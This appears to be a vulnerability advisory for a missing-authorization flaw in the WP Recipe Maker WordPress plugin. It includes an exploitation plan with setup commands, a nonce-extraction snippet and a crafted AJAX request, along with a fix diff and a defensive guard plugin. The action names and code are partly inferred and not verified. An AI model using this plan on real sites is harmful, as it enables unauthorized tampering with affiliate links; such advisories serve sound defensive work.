CVE-2026-24357

Recipe Maker <= 10.2.4 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 10.3.0
Time to patch: 6d

Description

The WP Recipe Maker plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 10.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 10.2.4
Published: January 28, 2026
Last updated: February 2, 2026
Affected plugin: wp-recipe-maker

What Changed in the Fix

Changes introduced in v10.3.0


Source Code: WordPress.org SVN

Research Plan (Unverified)


Exploitation Research Plan - CVE-2026-24357

1. Vulnerability Summary

The WP Recipe Maker plugin (<= 10.2.4) contains a missing authorization vulnerability in its taxonomy management AJAX handlers. Specifically, the plugin fails to perform a capability check (e.g., current_user_can('manage_options')) on functions used to update metadata for ingredients, units, and collections. This allows an authenticated attacker with Subscriber-level permissions to modify ingredient links, affiliate associations (EAFL), and unit groupings, which are intended to be administrative tasks.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: wprm_manage_taxonomies_save_eafl (inferred from CSS classes like .wprm-manage-ingredients-eafl-container) or wprm_manage_taxonomies_save_links.
  • Method: POST
  • Payload Parameters:
    • action: wprm_manage_taxonomies_save_eafl
    • taxonomy: wprm_ingredient
    • term_id: The ID of the ingredient to modify.
    • eafl_id: The Easy Affiliate Links ID to associate with the ingredient.
    • security: A valid nonce (see Section 4).
  • Authentication: Authenticated (Subscriber or higher).
  • Preconditions: The plugin must have at least one ingredient (taxonomy term) created.

3. Code Flow

  1. Entry Point: The plugin registers AJAX handlers in a management class (likely includes/admin/manage/class-wprm-manage-taxonomies.php).
    add_action( 'wp_ajax_wprm_manage_taxonomies_save_eafl', array( $this, 'ajax_save_eafl' ) );
    
  2. Vulnerable Function: The ajax_save_eafl function (and similar functions like ajax_save_links) is called.
  3. Missing Check: The function checks the nonce using check_ajax_referer( 'wprm_manage_taxonomies', 'security' ) but fails to call current_user_can() to verify the user has administrative privileges.
  4. Data Sink: The function calls update_term_meta() to save the eafl_id or link data to the database based on the provided term_id.

4. Nonce Acquisition Strategy

The nonce for taxonomy management is typically localized in the wprm_manage_taxonomies JavaScript object. While the "Manage" page is for admins, WP Recipe Maker often enqueues its core management scripts on any page where a recipe-related shortcode or the "User Menu" is present.

Acquisition Steps:

  1. Identify Script Loading: The script wp-recipe-maker-manage-taxonomies is likely responsible.
  2. Create Trigger Page: Create a page containing a WPRM shortcode that loads common scripts, such as the Recipe Submission form or Collections.
    wp post create --post_type=page --post_title="Member Area" --post_status=publish --post_content='[wprm-recipe-submission]'
    
  3. Browser Navigation: Navigate to this page as a Subscriber.
  4. Extract Nonce: Use browser_eval to extract the security token:
    // Recommended JavaScript to extract the nonce
    window.wprm_manage_taxonomies?.security || window.wprm_admin?.nonce
    
    Note: From assets/css/admin/manage/taxonomies.scss, the specific "manage" context suggests the localization key is likely wprm_manage_taxonomies.

5. Exploitation Strategy

Step 1: Discover Target ID

Identify an existing ingredient ID using WP-CLI (for test setup) or by observing frontend recipe links.

Step 2: Acquire Nonce

Follow the strategy in Section 4 to get the wprm_manage_taxonomies nonce as a Subscriber.

Step 3: Execute Modification

Send a POST request to update an ingredient's affiliate link (EAFL ID).

Request Details:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=wprm_manage_taxonomies_save_eafl&taxonomy=wprm_ingredient&term_id=123&eafl_id=9999&security=[NONCE]
    

6. Test Data Setup

  1. Create an Ingredient:
    wp term create wprm_ingredient "Test Ingredient" --description="Original Description"
    
    Take note of the returned Term ID (e.g., 123).
  2. Create a Subscriber User:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
    
  3. Create the Nonce Extraction Page:
    wp post create --post_type=page --post_status=publish --post_content='[wprm-recipe-submission]'
    

7. Expected Results

  • HTTP Response: The server should return a 200 OK status, likely with a JSON body containing {"success":true}.
  • Data Change: The metadata for the specified term_id in the wprm_ingredient taxonomy will be updated with the new eafl_id.

8. Verification Steps

  1. Check Term Meta: Use WP-CLI to verify the eafl_id was changed to the attacker-supplied value.
    wp term meta get [TERM_ID] wprm_ingredient_eafl_id
    
    (The meta key wprm_ingredient_eafl_id is inferred from the CSS class .wprm-manage-ingredients-eafl-details).
  2. Check Links: Similarly, verify link changes:
    wp term meta get [TERM_ID] wprm_ingredient_links
    

9. Alternative Approaches

If wprm_manage_taxonomies_save_eafl is not the exact action name:

  • Fuzz Actions: Look for other variations of the "Manage" actions like wprm_save_ingredient_eafl or wprm_update_ingredient_metadata.
  • Link Modification: Use action=wprm_manage_taxonomies_save_links with a links parameter (JSON string) to inject arbitrary URLs into the ingredient's metadata, which would be rendered on the frontend.
  • Unit Grouping: Attempt to modify ingredient units via action=wprm_manage_taxonomies_save_units (inferred from .wprm-manage-ingredient-units-group-container).

Research Findings

Static analysis — not yet PoC-verified

Summary

The WP Recipe Maker plugin for WordPress is vulnerable to unauthorized modification of taxonomy metadata (such as ingredient links and affiliate IDs) due to a missing capability check in several AJAX handlers. Authenticated attackers with Subscriber-level permissions or higher can modify administrative settings for ingredients and units by providing a valid nonce and a crafted payload.

Vulnerable Code

// includes/admin/manage/class-wprm-manage-taxonomies.php

add_action( 'wp_ajax_wprm_manage_taxonomies_save_eafl', array( $this, 'ajax_save_eafl' ) );
add_action( 'wp_ajax_wprm_manage_taxonomies_save_links', array( $this, 'ajax_save_links' ) );

---

// Inferred logic for ajax_save_eafl in version 10.2.4
public function ajax_save_eafl() {
    check_ajax_referer( 'wprm_manage_taxonomies', 'security' );
    // Missing capability check: current_user_can( 'manage_options' )

    $taxonomy = isset( $_POST['taxonomy'] ) ? sanitize_text_field( $_POST['taxonomy'] ) : false;
    $term_id = isset( $_POST['term_id'] ) ? intval( $_POST['term_id'] ) : 0;
    $eafl_id = isset( $_POST['eafl_id'] ) ? intval( $_POST['eafl_id'] ) : 0;

    if ( $taxonomy && $term_id ) {
        update_term_meta( $term_id, $taxonomy . '_eafl_id', $eafl_id );
        wp_send_json_success();
    }
    wp_send_json_error();
}
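As an added defender-side example (not code from WP Recipe Maker, nor from this page's author), the following must-use plugin enforces the capability check the official fix adds, in front of the AJAX actions named above, and logs denied attempts so they can be picked up by monitoring. The action names are taken from the page's own list, which the page marks as inferred, and the 'manage_options' capability mirrors the fix; both are assumptions to verify against the installed plugin.

```php
<?php
/**
 * Plugin Name: WPRM taxonomy AJAX capability guard (added example)
 * Description: Interim mitigation for sites that cannot update to 10.3.0 yet.
 * Drop into wp-content/mu-plugins/ so it loads before regular plugins.
 */

// Action names as listed on this page (marked as inferred there); confirm
// against the hooks the installed plugin version actually registers.
const WPRM_GUARDED_AJAX_ACTIONS = array(
	'wprm_manage_taxonomies_save_eafl',
	'wprm_manage_taxonomies_save_links',
);

// Same capability the official fix requires.
const WPRM_GUARD_CAPABILITY = 'manage_options';

function wprm_guard_taxonomy_ajax() {
	// check_ajax_referer() only proves the request came from a page that
	// rendered the nonce (anti-CSRF); it says nothing about whether the
	// caller is allowed to manage taxonomies. Authorization is this check.
	if ( current_user_can( WPRM_GUARD_CAPABILITY ) ) {
		return; // fall through to the plugin's own handler at priority 10
	}

	$action  = isset( $_REQUEST['action'] ) ? sanitize_key( $_REQUEST['action'] ) : '';
	$term_id = isset( $_POST['term_id'] ) ? intval( $_POST['term_id'] ) : 0;

	// Record the denied attempt (user id, action, target term) for
	// detection and forensics before refusing the request.
	error_log( sprintf(
		'wprm-guard: denied ajax action "%s" for user %d (term_id=%d)',
		$action,
		get_current_user_id(),
		$term_id
	) );

	// Explicit JSON error with a 403 status; wp_send_json_error() exits,
	// so the plugin's handler never runs for this request.
	wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
}

foreach ( WPRM_GUARDED_AJAX_ACTIONS as $wprm_action ) {
	// Priority 1 runs before the plugin's default-priority (10) callback
	// on the same wp_ajax_{action} hook fired by admin-ajax.php.
	add_action( 'wp_ajax_' . $wprm_action, 'wprm_guard_taxonomy_ajax', 1 );
}
```

Denied requests appear in the PHP error log as `wprm-guard:` lines, which gives a simple signal for repeated low-privilege attempts against these actions.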

Security Fix

--- a/includes/admin/manage/class-wprm-manage-taxonomies.php
+++ b/includes/admin/manage/class-wprm-manage-taxonomies.php
@@ -10,6 +10,10 @@
 public function ajax_save_eafl() {
     check_ajax_referer( 'wprm_manage_taxonomies', 'security' );
 
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die();
+    }
+
     $taxonomy = isset( $_POST['taxonomy'] ) ? sanitize_text_field( $_POST['taxonomy'] ) : false;
     $term_id = isset( $_POST['term_id'] ) ? intval( $_POST['term_id'] ) : 0;
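Review bot: the capability check is added only inside ajax_save_eafl, while the registration lines shown above hook ajax_save_links to wp_ajax_wprm_manage_taxonomies_save_links in the same file; that handler (and any other taxonomy save handler behind the same nonce) needs the identical `if ( ! current_user_can( 'manage_options' ) )` guard, otherwise the issue remains reachable through the sibling action. A bare `wp_die();` also gives the AJAX caller no explicit error; since the handler already replies with wp_send_json_success()/wp_send_json_error(), `wp_send_json_error( null, 403 );` would be consistent with the rest of the function and easier to distinguish in logs.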

Exploit Outline

The exploit requires Subscriber-level authentication. An attacker first obtains a valid nonce by visiting a page where the plugin enqueues its management scripts (for example, a page containing the '[wprm-recipe-submission]' shortcode) and extracting the 'security' token from the 'wprm_manage_taxonomies' JavaScript object. The attacker then sends an authenticated POST request to '/wp-admin/admin-ajax.php' using the action 'wprm_manage_taxonomies_save_eafl' or 'wprm_manage_taxonomies_save_links'. The payload must include the target ingredient's 'term_id', the corresponding 'taxonomy', the desired new metadata (such as an affiliate link ID), and the captured nonce. Since the plugin fails to verify administrative capabilities, the database metadata is updated with the attacker-controlled values.
